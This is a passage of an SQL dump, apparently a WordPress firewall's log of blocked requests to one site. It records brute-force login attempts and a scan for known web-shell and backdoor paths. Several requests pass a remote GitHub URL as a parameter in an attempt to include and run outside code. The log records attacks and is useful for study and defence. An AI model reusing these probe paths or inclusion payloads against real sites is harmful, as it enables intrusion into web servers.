Safari\\/537.36\"}','M7cqBatxiJr32VSCwXKDZQUR',0,1663745539.6304,17684,'','POST',403,0,600,0,1,'',0),('77.68.122.133',1296333445,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','M8dIXvgKlcEh7F3VRojBJCUq',0,1663746019.8373,541,'','POST',403,0,600,0,1,'',0),('77.68.122.133',1296333445,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','8XdUYVrmhF7BNK09MeDzyPot',0,1663746021.1871,564,'','POST',403,0,600,0,1,'',0),('64.227.183.25',1088665369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','zOa0ngpND1IjMBi4qev8uSQh',0,1663746904.3702,9131,'','POST',403,0,600,0,1,'',0),('167.172.64.96',2813083744,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','hDfbqEX6ISpzKP8VrTJu0nQm',0,1663746895.4939,18020,'','POST',403,0,600,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','Cg8pQMsz2OA6wFUcj5f37Hti',0,1663748283.0350,16682,'','POST',403,0,600,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','Ci2PTat4Z3WyfMquBszL6mxj',0,1663748291.9851,8577,'','POST',403,0,600,0,1,'',0),('95.217.3.120',1608057720,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','MUkX387NlnYFVKpbGjQLq1aI',0,1663748718.0968,535,'','POST',403,0,600,0,1,'',0),('95.217.3.120',1608057720,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','3ZRJ7txrsBjMGvmFf5hS0u6l',0,1663748719.6117,520,'','POST',403,0,600,0,1,'',0),('192.71.144.12',3225915404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','KymULXlcu6oeEOV1dp02i3FA',0,1663749691.3111,7796,'','POST',403,0,600,0,1,'',0),('172.104.156.149',2892536981,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','h2aiOuIyCMzRSfgw7lTLxYqn',0,1663749682.1953,17675,'','POST',403,0,600,0,1,'',0),('141.94.247.170',2371811242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','oKnFmsZSCu2qcVHldXk8MiDJ',0,1663751093.8582,11088,'','POST',403,0,600,0,1,'',0),('209.182.195.110',3518415726,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','mMzeFksGR1aUVh8Kn7YJEAWX',0,1663751084.7036,21090,'','POST',403,0,600,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','C1rhpUBROQcY9nzxJjVWuLkv',0,1663752488.7067,1317,'','POST',403,0,600,0,1,'',0),('164.46.122.50',2754509362,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','BrxX4cJZ0RI1L5vdUPbnMNl9',0,1663752496.9392,541,'','POST',403,0,600,0,1,'',0),('185.2.5.77',3103917389,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','ck2fzpxCOSXqoJZimlU8L3NP',0,1663753918.3091,5868,'','POST',403,0,600,0,1,'',0),('162.144.87.29',2727368477,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','LQ5DiswbGU6Sv9jpV0MK1faJ',0,1663753906.4693,18506,'','POST',403,0,600,0,1,'',0),('213.152.162.149',3583550101,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gKrom8wvTij0UPlQWOLBqz24',0,1663754223.5531,2615,'','POST',403,0,515,0,1,'',0),('77.68.122.133',1296333445,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','bc3Bv0tNqu8DLpajXihmMQAS',0,1663754473.5911,443,'','POST',403,0,600,0,1,'',0),('77.68.122.133',1296333445,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','7nwsHuxMqLOoZ3DtBRJ86lQE',0,1663754474.9048,471,'','POST',403,0,600,0,1,'',0),('61.219.43.253',1037773821,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','s19ZXVAg2yraNUljzCFWKOxf',0,1663755322.2771,8337,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','Ygf68aHunJAsFzklUb0chG45',0,1663755313.1552,17459,'','POST',403,0,600,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','b2xnTjk347VKcPOymFuDZhw5',0,1663756754.0457,1456,'','POST',403,0,600,0,1,'',0),('178.128.187.183',2994781111,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','jetR9yLFbIG0XnP1aZi8p3lf',0,1663756760.1826,569,'','POST',403,0,600,0,1,'',0),('47.107.242.103',795603559,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','gxF3qn87AhYPZbBKfC0rXz2d',0,1663758192.9453,2523,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','aHrXR84vkCTUBMoWuExjIOGm',0,1663758202.1815,572,'','POST',403,0,600,0,1,'',0),('213.152.187.220',3583556572,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Xsk7IKRJw9QbndYDygLfp48q',0,1663759188.8023,18651,'','POST',403,0,515,0,1,'',0),('159.65.200.228',2671888612,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','CDcshiFxV73Il4SWz26TL1Uu',0,1663759623.1023,1862,'','POST',403,0,600,0,1,'',0),('91.249.163.48',1543086896,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','slZtvKr7gjbQ5mySewNA16iI',0,1663759631.6261,479,'','POST',403,0,600,0,1,'',0),('142.93.201.0',2388510976,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','PgcRSV8CZrQOFAG9WBtUv3Je',0,1663761062.0172,2795,'','POST',403,0,600,0,1,'',0),('167.172.105.95',2813094239,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','DHt4jPeSWmJXKFZ9Uld35Y6R',0,1663761070.9335,545,'','POST',403,0,600,0,1,'',0),('103.226.251.11',1742928651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','0ZtE9lP6IYRJkMSfDyWqAvuT',0,1663762099.2436,802,'','POST',403,0,600,0,1,'',0),('103.226.251.11',1742928651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','Q8LlauErmHDsYVK1O0MnhFek',0,1663762101.2486,667,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','wI9ZBDKbE5puN1aTVkz3CoqR',0,1663762514.6781,5113,'','POST',403,0,600,0,1,'',0),('64.90.36.102',1079649382,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','SCBLZh0vKY7ElAFQT5tbVjG8',0,1663762505.7917,14885,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','sKjo3g6eamFl5U7XRCcSAdTO',0,1663763957.6231,4629,'','POST',403,0,600,0,1,'',0),('159.89.199.237',2673461229,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','v1fDeATIYVEQJBNhFkg0dGCt',0,1663763948.4074,14662,'','POST',403,0,600,0,1,'',0),('193.37.254.11',3240492555,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','caGfU7rA5CH0FDnIwspRkdYX',0,1663764262.6553,19212,'','POST',403,0,515,0,1,'',0),('62.102.148.158',1046910110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zB3OK9mnhiCZtTN8GvV2sIPe',0,1663764909.5298,19107,'','POST',403,0,515,0,1,'',0),('161.35.126.102',2703457894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','iHdvs245YJrnOD6NCkpGgfeq',0,1663765407.5751,8753,'','POST',403,0,600,0,1,'',0),('34.76.63.113',575422321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','r8cMedoFBGWNyj0mvkwhYDbA',0,1663765405.0965,12067,'','POST',403,0,600,0,1,'',0),('23.97.205.210',392285650,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','1RTMBLVQr0zIS7ZKpsndFGhx',0,1663766838.1605,1794,'','POST',403,0,600,0,1,'',0),('142.93.54.10',2388473354,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','go524ZGXyW1Eab9rh0QALJnC',0,1663766846.9240,497,'','POST',403,0,600,0,1,'',0),('205.185.116.162',3451483298,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','5xjOYrXDom3Rwsk1LvclBZWI',0,1663767894.2037,541,'','POST',403,0,600,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hpfN4JgUPuoHzOyVA2xTFk98',0,1663768468.5652,12378,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KE2IknJhexR01qbauXWHZBQy',0,1663768483.4177,290,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','54rZqt0lacvyJ2gmLkXoH93U',0,1663768484.8354,302,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','npHXUISsr4Zx7R93MYlyLVPk',0,1663768485.9267,336,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7kMITrQzFE5y9qB6dugNiKCl',0,1663768523.5053,282,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VLjNrzHgCb9q60JSYlKfyP2e',0,1663768524.9303,317,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fVqGbNSJioPRFOxQjIlgBCwh',0,1663768527.9092,276,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KZ7it2vb5np0ch1ErFWHqT4m',0,1663768532.9233,285,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','deDIMajUZHQ8c7i940pEFfLl',0,1663768535.6349,294,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','w0sylHbO9pk6CagTdo2x8enu',0,1663768537.8411,302,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','70RfkQxnlMqKGOW1mUAZEdTu',0,1663768538.9429,333,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','obK8TpA21acV0NsfXthnMEDJ',0,1663768543.8783,283,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tgzQRsAOhkUjqfGbHuZBoDCy',0,1663768545.3279,329,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kUdFCxbsfmAGDLhwS65N78zt',0,1663768546.8153,321,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','TNA61EiM7X2DGLncsvJOkqQF',0,1663768548.9324,308,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','32k1yzW0euDLXpZ76nQBFofE',0,1663768553.1540,313,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4TulMUpOsg6S1aLw7VvBc9rD',0,1663768555.3498,342,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZWGV6uNlHfycqjgwtDQPTdRp',0,1663768557.8531,279,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0Hy9OCobJuz4j53qBt7PRrLd',0,1663768566.0078,363,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','i9gO35SZz0B2TerlDqXdub16',0,1663768569.7829,337,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YmpH6C9Dq8hBJjbEuSZzMV42',0,1663768572.6918,339,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tQlwiepxR7UT0yK3g1soku4r',0,1663768573.9311,283,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vdlNRDgPOxaJ8Ez4o16kbqMw',0,1663768579.5354,292,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LnmvzrgROd5c7HKZAMCktu2Q',0,1663768580.5575,354,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IfuE3Ky14rWYaxOXnelkZij6',0,1663768584.8339,316,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dk68b3ztixHZMcpDPgjaBKQr',0,1663768586.4681,280,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','https://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rouQB5bSnsOTYgUMAItzhXcl',0,1663768591.5238,285,'','POST',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vPkQ8dLE2TsUpxOt4AnJyaml',0,1663768592.8336,292,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ylJzbK2h19pXH76DrsqQOPEW',0,1663768593.9076,285,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pGaOZ3JFzAokD8n0xvQWPEis',0,1663768597.2378,304,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Apo5r4CwsY1jIEyBFWklG97P',0,1663768607.3187,285,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','HbPaYT6kqgIzWKr7el4oAnu5',0,1663768618.1278,344,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 